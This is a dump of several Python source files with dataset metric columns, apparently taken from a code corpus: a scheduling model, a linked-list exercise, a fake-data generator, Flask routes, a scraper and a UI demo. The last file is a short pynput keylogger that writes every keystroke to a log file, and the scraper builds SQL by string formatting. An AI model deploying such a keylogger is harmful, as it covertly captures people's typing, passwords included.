| 0.038304
| 0.04104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009335
| 0.32837
| 1,276
| 66
| 64
| 19.333333
| 0.843641
| 0.104232
| 0
| 0.179487
| 0
| 0
| 0.000911
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.076923
| 0.025641
| 0.358974
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c6baa9940a450d52040d4e352d35fb76791c5db
| 1,733
|
py
|
Python
|
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | null | null | null |
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | 1
|
2019-11-06T19:21:49.000Z
|
2019-11-06T19:21:49.000Z
|
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | null | null | null |
from database.interface import FirebaseInterface
class Schedule:
def __init__(self):
self.id = None
self.titulo = None
self.data = None
self.caminhao = None
self.mecanico = None
def validateFields(self, office_schedule):
if self.titulo is None:
raise Exception("Tรญtulo nรฃo informado")
if self.data is None:
raise Exception("Data nรฃo informada")
else:
for event in office_schedule:
if event["data"] == self.data:
raise Exception("Dia solicitado nรฃo estรก disponรญvel")
if self.caminhao is None:
raise Exception("Caminhรฃo nรฃo encontrado")
if self.mecanico is None or self.mecanico["cargo"] != "mecanico":
raise Exception("Mecรขnico nรฃo encontrado")
def buildObject(self, req):
interface = FirebaseInterface()
user_id = req["id_usuario"]
self.mecanico = interface.getData("users", user_id)
truck_board = req["placa_caminhao"]
self.caminhao = interface.getDataByField("trucks", "placa", truck_board)
self.data = req["data"]
self.titulo = req["titulo"]
def setId(self):
interface = FirebaseInterface()
event_id = interface.getData("const_data", "office_id")
self.id = event_id["id"] + 1
interface.updateData({"id": event_id["id"] + 1}, "const_data", "office_id")
@staticmethod
def findIdIndex(id, office):
for index in range(len(office)):
if office[index]["id"] == id:
return index
elif index + 1 == len(office) and office[index]["id"] != id:
raise Exception("Id invรกlido")
| 30.403509
| 83
| 0.590306
| 194
| 1,733
| 5.175258
| 0.324742
| 0.083665
| 0.032869
| 0.059761
| 0.023904
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002469
| 0.298904
| 1,733
| 56
| 84
| 30.946429
| 0.823868
| 0
| 0
| 0.04878
| 0
| 0
| 0.140796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121951
| false
| 0
| 0.02439
| 0
| 0.195122
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c6d83deebd752e29ffb47bbb2f60866fbe395f9
| 1,947
|
py
|
Python
|
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 16:59:33 2021
@author: dopiwoo
Given the head of a LinkedList and a number 'k', reverse every alternating 'k' sized sub-list starting from the head.
If, in the end, you are left with a sub-list with less than 'k' elements, reverse it too.
"""
class Node:
def __init__(self, value: int, next_node: 'Node' = None):
self.value = value
self.next = next_node
def __repr__(self) -> str:
string = ''
temp_node = self
while temp_node is not None:
string += '->' + str(temp_node.value)
temp_node = temp_node.next
return string[2:]
def reverse_alternative_k_elements(head: Node, k: int) -> Node or None:
"""
Time Complexity: O(N)
Space Complexity: O(1)
Parameters
----------
head : Node
Input head of a LinkedList.
k : int
Input number 'k'.
Returns
-------
Node or None
The LinkedList reversed every alternating 'k' sized sub-list starting from the head.
"""
if not head:
return None
cur, prev = head, None
while cur:
i = 0
tail, con = cur, prev
while cur and i < k:
third = cur.next
cur.next = prev
prev = cur
cur = third
i += 1
if con:
con.next = prev
else:
head = prev
tail.next = cur
i = 0
while cur and i < k:
prev = cur
cur = cur.next
i += 1
return head
if __name__ == '__main__':
a = Node(1)
a.next = Node(2)
a.next.next = Node(3)
a.next.next.next = Node(4)
a.next.next.next.next = Node(5)
a.next.next.next.next.next = Node(6)
a.next.next.next.next.next.next = Node(7)
a.next.next.next.next.next.next.next = Node(8)
print(a)
print(reverse_alternative_k_elements(a, 2))
| 24.037037
| 117
| 0.546482
| 278
| 1,947
| 3.723022
| 0.330935
| 0.170048
| 0.173913
| 0.154589
| 0.226087
| 0.180676
| 0.156522
| 0.096618
| 0.096618
| 0.096618
| 0
| 0.021756
| 0.338983
| 1,947
| 80
| 118
| 24.3375
| 0.78244
| 0.291217
| 0
| 0.173913
| 0
| 0
| 0.010679
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0
| 0
| 0
| 0.152174
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c6f8f5f4f2e782fc4abccdc891d3ed15ff06ea9
| 6,625
|
py
|
Python
|
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | null | null | null |
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | 2
|
2021-02-13T13:19:45.000Z
|
2021-02-13T14:46:02.000Z
|
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | null | null | null |
import json
import random
import os
import re
from faker import Faker
################################################################################
# Some settings:
################################################################################
ADMIN_COUNT = 2
STUDENT_COUNT = 40
LECTURER_COUNT = 10
EXAM_REG_COUNT = 6
COURSE_COUNT = 10
ROLES = ["Student", "Admin", "Lecturer"]
FIELDS_OF_STUDY = [
"Computer Science",
"Chemistry",
"Biology",
"Physics",
"Religion",
"Sociology",
]
MODULE_PREFICES = [
"Topics of",
"Introduction to",
"Applied",
"Theorotical",
"Experimental",
]
COURSE_TYPES = ["Lecture", "Project Group", "Seminar"]
COUNTRIES = ["Germany", "United States", "Italy", "France", "United Kingdom", "Belgium", "Netherlands", "Spain", "Austria", "Switzerland", "Poland"]
fake = Faker("en-US")
fake.random.seed(654321)
################################################################################
basepath = os.path.join("defaults", "generated")
lecturer_ids = []
modules_by_field_of_study = {
field: [] for field in FIELDS_OF_STUDY
} # Dict with modules mapped to their field of study (to let generated data appear less random)
def generate_user(role: str):
assert role in ROLES
strip_username = lambda username: re.sub("^[a-zA-Z-.]", "", username)
profile = fake.simple_profile()
while (
len(profile["name"].split(" ")) != 2
and len(strip_username(profile["username"])) not in range(5,17)
): # Some names were like Mr. John Smith...
profile = fake.simple_profile()
username = strip_username(profile["username"])
return {
"governmentId": username + fake.pystr(),
"authUser": {
"username": username,
"password": username, # more convenient than fake.password(),
"role": role,
},
"user": {
"username": username,
"enrollmentIdSecret": "",
"isActive": True,
"role": role,
"address": {
"street": fake.street_name(),
"houseNumber": fake.building_number().lstrip("0"),
"zipCode": fake.postcode(),
"city": fake.city(),
"country": random.choice(COUNTRIES)
},
"firstName": profile["name"].split(" ")[0],
"lastName": profile["name"].split(" ")[1],
"email": profile["mail"],
"birthDate": profile["birthdate"].strftime("%Y-%m-%d"),
"phoneNumber": "+{:012d}".format(fake.pyint(0, int("9"*12))),
},
}
def generate_student():
student = generate_user("Student")
student["user"]["latestImmatriculation"] = ""
student["user"]["matriculationId"] = str(fake.pyint(1000000, 9999999))
return student
def generate_lecturer(all_lecturer_ids: list):
lecturer = generate_user("Lecturer")
lecturer["user"]["freeText"] = fake.paragraph()
lecturer["user"]["researchArea"] = fake.job()
all_lecturer_ids.append(lecturer["user"]["username"])
return lecturer
def generate_admin():
return generate_user("Admin")
def generate_exam_reg(all_modules: list):
field_of_study = random.choice(FIELDS_OF_STUDY)
my_modules = []
count = random.randint(2, 5) # Random number of modules for this exam reg
for _ in range(count):
# Choose existing or generate new module for this exam reg
if random.random() < 0.8 or not my_modules:
new_module = {
"id": "M."
+ str(fake.pyint(0, 9999)).zfill(4)
+ "."
+ str(fake.pyint(0, 99999)).zfill(5),
"name": random.choice(MODULE_PREFICES) + " " + field_of_study,
}
all_modules[field_of_study].append(new_module)
my_modules.append(new_module)
elif (
field_of_study in modules_by_field_of_study
and modules_by_field_of_study[field_of_study]
):
module_cand = random.choice(modules_by_field_of_study[field_of_study])
if module_cand and module_cand not in my_modules:
my_modules.append(module_cand)
return {
"name": random.choice(["Bachelor", "Master"])
+ " "
+ field_of_study
+ " v"
+ str(fake.pyint(1, 8)),
"active": True,
"modules": my_modules,
}
def generate_course():
lecturer = random.choice(lecturer_ids)
flatten = lambda list_to_flatten: [
item for sub_list in list_to_flatten for item in sub_list
]
all_module_ids = set(
map(
lambda module: module.get("id"), flatten(modules_by_field_of_study.values())
)
)
module_ids = random.sample(all_module_ids, random.randint(1, 4))
return {
"courseId": "",
"moduleIds": module_ids,
"courseName": fake.catch_phrase(),
"courseType": random.choice(COURSE_TYPES),
"startDate": "2020-12-08",
"endDate": "2020-12-08",
"ects": random.randint(3, 10),
"lecturerId": lecturer,
"maxParticipants": 10 * random.randint(1, 20),
"currentParticipants": 0,
"courseLanguage": random.choice(["German", "English"]),
"courseDescription": fake.paragraph(2),
}
def write_to_file(data, _dir, filename):
directory = os.path.join(os.path.dirname(__file__), basepath, _dir)
if not os.path.exists(directory):
os.makedirs(directory)
with open(os.path.join(directory, filename), "w+") as f:
f.write(data)
def json_dump_dict(data: dict):
return json.dumps(data, indent=4)
for i in range(ADMIN_COUNT):
write_to_file(
json_dump_dict(generate_student()), "admins", str(i).zfill(2) + ".json"
)
for i in range(STUDENT_COUNT):
write_to_file(
json_dump_dict(generate_student()), "students", str(i).zfill(2) + ".json"
)
for i in range(LECTURER_COUNT):
write_to_file(
json_dump_dict(generate_lecturer(lecturer_ids)),
"lecturers",
str(i).zfill(2) + ".json",
)
for i in range(EXAM_REG_COUNT):
write_to_file(
json_dump_dict(generate_exam_reg(modules_by_field_of_study)),
"examRegs",
str(i).zfill(2) + ".json",
)
for i in range(COURSE_COUNT):
write_to_file(
json_dump_dict(generate_course()), "courses", str(i).zfill(2) + ".json"
)
print("Done! ๐")
print(
"Generated: {} Admins, {} Students, {} Lecturers, {} Exam Regs and {} Courses".format(
ADMIN_COUNT, STUDENT_COUNT, LECTURER_COUNT, EXAM_REG_COUNT, COURSE_COUNT
)
)
| 30.113636
| 148
| 0.579019
| 747
| 6,625
| 4.92905
| 0.313253
| 0.032319
| 0.045627
| 0.026073
| 0.125747
| 0.104834
| 0.097773
| 0.097773
| 0.050516
| 0
| 0
| 0.019023
| 0.246189
| 6,625
| 219
| 149
| 30.251142
| 0.718062
| 0.042717
| 0
| 0.101124
| 0
| 0
| 0.159639
| 0.003445
| 0
| 0
| 0
| 0
| 0.005618
| 1
| 0.044944
| false
| 0.005618
| 0.02809
| 0.011236
| 0.11236
| 0.011236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c70133f7cd579129c6a6ff4af02a403f5a5c1b6
| 2,972
|
py
|
Python
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 16
|
2021-06-03T07:16:15.000Z
|
2022-03-24T13:07:31.000Z
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 6
|
2021-06-30T12:06:33.000Z
|
2022-02-10T04:49:10.000Z
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 4
|
2021-07-04T14:21:56.000Z
|
2021-08-23T19:55:06.000Z
|
###LATTICE OPERATIONS
from .data_structure_definitions import *
def trimTrapStates(doof):
flag = 1
while flag == 1:
flag = 0
statesToDelete = []
dict_items = set([t[0][0] for t in doof.transitions.items()])
for i, state in enumerate(doof.states):
if state not in dict_items:
# if len([0 for (k, v) in dict_items if k[0] == state]) == 0:
if state != doof.engEnd and state != doof.mixEnd and state != doof.hinEnd and state not in doof.finalStates:
statesToDelete.append(state)
flag = 1
for state in statesToDelete:
doof.deleteState(state)
def mergeEquivalentStates(doof):
flag = 1
while flag == 1:
flag = 0
toMerge = []
for state1 in doof.states:
for state2 in doof.states:
if state1 != state2:
transitions1 = [(k[1], v) for k,v in doof.transitions.items() if k[0] == state1]
transitions2 = [(k[1], v) for k,v in doof.transitions.items() if k[0] == state2]
if transitions1!=[] and transitions2!=[] and transitions1 == transitions2:
toMerge.append((state1, state2))
flag = 1
for pair in toMerge:
if pair[0] in doof.states and pair[1] in doof.states:
# print 'deleting these:'
# print pair[0], pair[1]
doof.mergeStates(pair[0], [pair[1]])
def removeUselessStates(doof):
statesToRemove = []
for state in doof.states:
transIn = {k: v for k, v in doof.transitions.items() if v == state}
transOut = {k: v for k, v in doof.transitions.items() if k[0] == state}
if state != 0 and len(transIn) == 0:
statesToRemove.append(state)
if len(transIn) == 1 and len(transOut) == 1:
keys_in = list(transIn.keys())
keys_out = list(transOut.keys())
values_out = list(transOut.values())
doof.addTransition(keys_in[0][0], keys_in[0][1][:-2]+" "+keys_out[0][1], values_out[0])
del doof.transitions[keys_in[0]]
del doof.transitions[keys_out[0]]
statesToRemove.append(state)
for state in statesToRemove:
doof.deleteState(state)
def removeDollarTransitions(doof):
dollarTransitions = {k:v for k,v in doof.transitions.items() if k[1] == "$_h" or k[1] == "$_e"}
for k,v in dollarTransitions.items():
transitionsToSink = {kk:vv for kk,vv in doof.transitions.items() if vv == v}
if len(transitionsToSink) == 1:
del doof.transitions[k]
doof.mergeStates(k[0], [v])
else:
print("null transition between" + str(k[0]) + "and" + str(v) + "could not be removed")
def removeUnreachableStates(doof):
flag = 1
while flag == 1:
flag = 0
statesToDelete = []
for state in doof.states:
if len({k: v for k, v in doof.transitions.items() if v == state}) == 0:
if state != doof.initialStates[0]:
statesToDelete.append(state)
flag = 1
for state in statesToDelete:
doof.deleteState(state)
| 33.393258
| 116
| 0.605316
| 409
| 2,972
| 4.359413
| 0.190709
| 0.050477
| 0.076276
| 0.09871
| 0.340998
| 0.255188
| 0.255188
| 0.255188
| 0.241727
| 0.199103
| 0
| 0.028662
| 0.260431
| 2,972
| 89
| 117
| 33.393258
| 0.78253
| 0.042059
| 0
| 0.367647
| 0
| 0
| 0.018649
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073529
| false
| 0
| 0.014706
| 0
| 0.088235
| 0.014706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c749728947c088616bb2bf3b46fdb1485731043
| 5,021
|
py
|
Python
|
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Define routes for CRUD operations on users."""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from application.models import (Base,
Gift,
Claim,
User)
from flask import (request,
redirect,
url_for,
render_template,
flash,
session,
Blueprint)
# For making decorators
from functools import wraps
# Bind database
engine = create_engine('sqlite:///giftr.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
c = DBSession()
users_blueprint = Blueprint('users', __name__, template_folder='templates')
# DECORATORS
def login_required(f):
"""Redirect to login page if the user is not logged in (decorator)."""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'username' not in session:
flash('You need to be logged in to see that page.')
return redirect(url_for('login.show'))
return f(*args, **kwargs)
return decorated_function
def include_user(f):
"""Take a u_id kwarg and return a user object (decorator)."""
@wraps(f)
def decorated_function(*args, **kwargs):
u_id = kwargs['u_id']
user = c.query(User).filter_by(id=u_id).one_or_none()
if not user:
flash('There\'s no user here.')
return redirect(url_for('gifts.get'))
# pass along the gift object to the next function
kwargs['user'] = user
return f(*args, **kwargs)
return decorated_function
def user_required(f):
"""Take a user id (u_id) and redirect to home if logged in user doesn't match that id (decorator).""" # noqa
@wraps(f)
def decorated_function(*args, **kwargs):
u_id = kwargs['u_id']
if u_id != session.get('user_id'):
flash('You can only do this for your own profile.')
return redirect(url_for('gifts.get'))
return f(*args, **kwargs)
return decorated_function
# ROUTES
@users_blueprint.route('/users/<int:u_id>/profile', methods=['GET'])
@login_required
@include_user
def get_byid(u_id, user):
"""Render a user with id u_id's profile.
Argument:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
return render_template('user.html',
user=user)
@users_blueprint.route('/users/<int:u_id>/edit', methods=['GET'])
@login_required
def edit_get(u_id):
"""Render an edit form for the logged in user.
Login required.
Argument:
u_id (int): the id of the desired user.
"""
return render_template('edit_user.html')
@users_blueprint.route('/users/<int:u_id>/edit', methods=['POST'])
@login_required
@user_required
@include_user
def edit_post(u_id, user):
"""Edit a user of id u_id with POST.
Login required.
One has to be logged in as the requested user to access this.
Arguments:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
user.name = request.form.get('name')
user.picture = request.form.get('picture')
user.email = request.form.get('email')
user.address = request.form.get('address')
c.add(user)
c.commit()
session['username'] = user.name
session['picture'] = user.picture
session['email'] = user.email
session['address'] = user.address
flash("Your account was successfully edited.")
return redirect(url_for('users.get_byid',
u_id=user.id))
@users_blueprint.route('/users/<int:u_id>/delete', methods=['GET'])
@login_required
def delete_get(u_id):
"""Render a delete form for the logged in user.
Login required.
Arguments:
u_id (int): the id of the desired user.
"""
return render_template('delete_user.html')
@users_blueprint.route('/users/<int:u_id>/delete', methods=['POST'])
@login_required
@include_user
@user_required
def delete_post(u_id, user):
"""Delete a user of id u_id with POST.
Login required.
One has to be the creator of the gift to access this.
Argument:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
# Delete the gifts of that user too
user_gifts = c.query(Gift).filter_by(creator_id=user.id).all()
for gift in user_gifts:
# Delete the claims to that gift first
claims = c.query(Claim).filter_by(gift_id=gift.id).all()
for claim in claims:
c.delete(claim)
c.delete(gift)
c.delete(user)
c.commit()
flash("Your account was successfully deleted.")
return redirect(url_for('logout.disconnect'))
| 28.050279
| 113
| 0.632344
| 695
| 5,021
| 4.434532
| 0.21295
| 0.029202
| 0.012979
| 0.032446
| 0.418559
| 0.377028
| 0.358858
| 0.336145
| 0.268008
| 0.208306
| 0
| 0
| 0.253137
| 5,021
| 178
| 114
| 28.207865
| 0.821867
| 0.289584
| 0
| 0.297872
| 0
| 0
| 0.148824
| 0.034412
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117021
| false
| 0
| 0.053191
| 0
| 0.319149
| 0.074468
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c7515d17c45501d0f2599188199dfb75f86e5a6
| 2,077
|
py
|
Python
|
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
from flask import Flask
import requests
from bs4 import BeautifulSoup
import os
import sqlite3
import logging
logging.basicConfig(filename='example.log', level=logging.DEBUG)
URL = os.environ['SOURCE_URL']
AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
app = Flask(__name__)
def send_simple_message(title, message):
return requests.post(
os.environ['MAIL_URL'],
auth=("api", os.environ['MAILGUN_API_KEY']),
data={"from": "Embevent App <mailgun@sandboxfb0448ff1cfb4ffba160daeecce04274.mailgun.org>",
"to": os.environ['MAIL_LIST'].split(";"),
"subject": title,
"text": message})
def processUpdates(cards):
connection = sqlite3.connect("database.db")
cursor = connection.execute("Select * from CARDS")
old_cards = len(cursor.fetchall())
if len(cards) > old_cards:
logging.info("New updates. Processing")
card = cards[0]
title = card.find_all('h2', class_='h3')[0].text
date = card.find_all('h3', class_='h5')[0].text
content = card.find_all(["p", "div"])[0]
command2 = "INSERT INTO CARDS (title, date, content) VALUES ('{0}', '{1}', '{2}')".format(title,date,content)
connection.execute(command2)
connection.commit()
connection.close()
logging.info("Update stored in DB")
send_simple_message(title=title, message=card)
logging.info("Mail sent")
return card.text
else:
logging.info("No updates generated")
f = cards[0]
the_date, = f.find_all('h3', class_='h5')
return "No news. Last update: {0}. articles available: {1}".format(the_date.text, old_cards)
@app.route('/')
def news():
if not URL:
return "No URL added"
response = requests.get(URL, headers={'User-Agent': AGENT })
soup = BeautifulSoup(response.content, 'html.parser')
cards = soup.find_all('div', class_='card')
return processUpdates(cards)
| 32.968254
| 131
| 0.632162
| 262
| 2,077
| 4.900763
| 0.465649
| 0.027259
| 0.025701
| 0.034268
| 0.024922
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038272
| 0.220029
| 2,077
| 63
| 132
| 32.968254
| 0.754321
| 0
| 0
| 0
| 0
| 0.020408
| 0.263234
| 0.029355
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061224
| false
| 0
| 0.122449
| 0.020408
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c7727ecdb99959039e2a39114163de2e8432514
| 1,549
|
py
|
Python
|
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
"""
Implementation of a ButtonEditor demo plugin for Traits UI demo program.
This demo shows each of the two styles of the ButtonEditor.
(As of this writing, they are identical.)
"""
from traits.api import HasTraits, Button
from traitsui.api import Item, View, Group
from traitsui.message import message
#-------------------------------------------------------------------------
# Demo Class
#-------------------------------------------------------------------------
class ButtonEditorDemo(HasTraits):
""" This class specifies the details of the ButtonEditor demo.
"""
# To demonstrate any given Trait editor, an appropriate Trait is required.
fire_event = Button('Click Me')
def _fire_event_fired():
message("Button clicked!")
# ButtonEditor display
# (Note that Text and ReadOnly versions are not applicable)
event_group = Group(Item('fire_event', style='simple', label='Simple'),
Item('_'),
Item('fire_event', style='custom', label='Custom'),
Item('_'),
Item(label='[text style unavailable]'),
Item('_'),
Item(label='[read only style unavailable]'))
# Demo view
view1 = View(event_group,
title='ButtonEditor',
buttons=['OK'],
width=250)
# Create the demo:
popup = ButtonEditorDemo()
# Run the demo (if invoked from the command line):
if __name__ == '__main__':
popup.configure_traits()
| 30.98
| 78
| 0.551323
| 158
| 1,549
| 5.278481
| 0.531646
| 0.043165
| 0.040767
| 0.043165
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0035
| 0.262105
| 1,549
| 49
| 79
| 31.612245
| 0.726159
| 0.404132
| 0
| 0.142857
| 0
| 0
| 0.160932
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.142857
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c77652672bdfce35cef51c965f7b9c88501f504
| 1,181
|
py
|
Python
|
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import setuptools
version='0.1'
setuptools.setup(
name='TracDevPlatformPlugin',
version=version,
description='Provide helpers to ease development on top of Trac',
author='Felix Schwarz',
author_email='felix.schwarz@oss.schwarz.eu',
url='http://www.schwarz.eu/opensource/projects/trac_dev_platform',
download_url='http://www.schwarz.eu/opensource/projects/trac_dev_platform/download/%s' % version,
license='MIT',
install_requires=['Trac >= 0.11'],
extras_require={'BeautifulSoup': 'BeautifulSoup'},
tests_require=['nose'],
test_suite = 'nose.collector',
zip_safe=False,
packages=setuptools.find_packages(exclude=['tests']),
include_package_data=True,
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Framework :: Trac',
],
)
| 31.078947
| 101
| 0.653683
| 125
| 1,181
| 6.064
| 0.672
| 0.03562
| 0.026385
| 0.044855
| 0.158311
| 0.158311
| 0.158311
| 0.158311
| 0.158311
| 0.158311
| 0
| 0.007439
| 0.203218
| 1,181
| 37
| 102
| 31.918919
| 0.798087
| 0.035563
| 0
| 0
| 0
| 0
| 0.520246
| 0.043134
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c78adc10fdbecc0bce8f85ff740740007a63985
| 276
|
py
|
Python
|
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
from pynput.keyboard import Key, Listener
import logging
logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
| 23
| 102
| 0.735507
| 39
| 276
| 5.128205
